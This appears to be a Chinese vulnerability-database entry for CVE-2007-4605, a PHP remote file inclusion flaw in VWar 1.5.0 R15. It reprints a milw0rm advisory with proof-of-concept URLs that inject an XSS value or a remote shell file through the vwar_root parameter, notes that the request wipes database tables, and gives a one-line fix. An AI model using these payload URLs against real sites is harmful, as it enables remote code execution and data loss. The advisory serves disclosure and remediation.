VWar Virtual War 代码注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1113533 漏洞类型 代码注入
发布时间 2007-08-28 更新时间 2007-08-30
CVE编号 CVE-2007-4605 CNNVD-ID CNNVD-200708-494
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/4332
https://www.securityfocus.com/bid/85450
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200708-494
|漏洞详情
VirtualWar(VWar)1.5.0R15版本及其早期版本的convert/mvcw.php中存在PHP远程文件包含漏洞。远程攻击者执行任意PHP代码可以借助vwar_root参数中的一个URL,该漏洞不同于CVE-2006-1503,CVE-2006-1636,和CVE-2006-1747。
|漏洞EXP
\#'#/
                            (-.-)
   --------------------oOO---(_)---OOo--------------------
   | VWar <= v1.5.0 R15 (mvcw.php) Remote File Inclusion |
   |                    coded by DNX                     |
   -------------------------------------------------------
[!] Discovered: DNX
[!] Vendor: http://www.vwar.de
[!] Detected: 26.02.2007
[!] Reported: 27.02.2007
[!] Remote: yes

[!] Background: VWar is a team organizer based on PHP and MySQL

[!] Bug: $vwar_root in convert/mvcw.php

[!] PoC:
    - http://[site]/[path]/convert/mvcw.php?vwar_root=[xss]
    - http://[site]/[path]/convert/mvcw.php?step=1&vwar_root=[shell]

[!] Example:
    - http://127.0.0.1/vwar/convert/mvcw.php?step=1&vwar_root=http//127.0.0.1/shell.txt?

[!] Warning: "step=1" deletes all data from the tables vwar, vwar_opponents,
    vwar_scores and vwar_screen in the database

[!] Solution: No update from vendor till now

[!] Quick fix in convert/mvcw.php line 79:
    - replace:
	if ($GPC['step'] == 1)
	{
		// clean tables

    - with:
	if ($GPC['step'] == 1)
	{
		$vwar_root = "./../";
		// clean tables

# milw0rm.com [2007-08-28]
|受影响的产品
VWar Virtual War 1.5.0 R15
|参考资料

来源:MILW0RM
名称:4332
链接:http://www.milw0rm.com/exploits/4332
来源:XF
名称:vwar-mvcw-file-include(36316)
链接:http://xforce.iss.net/xforce/xfdb/36316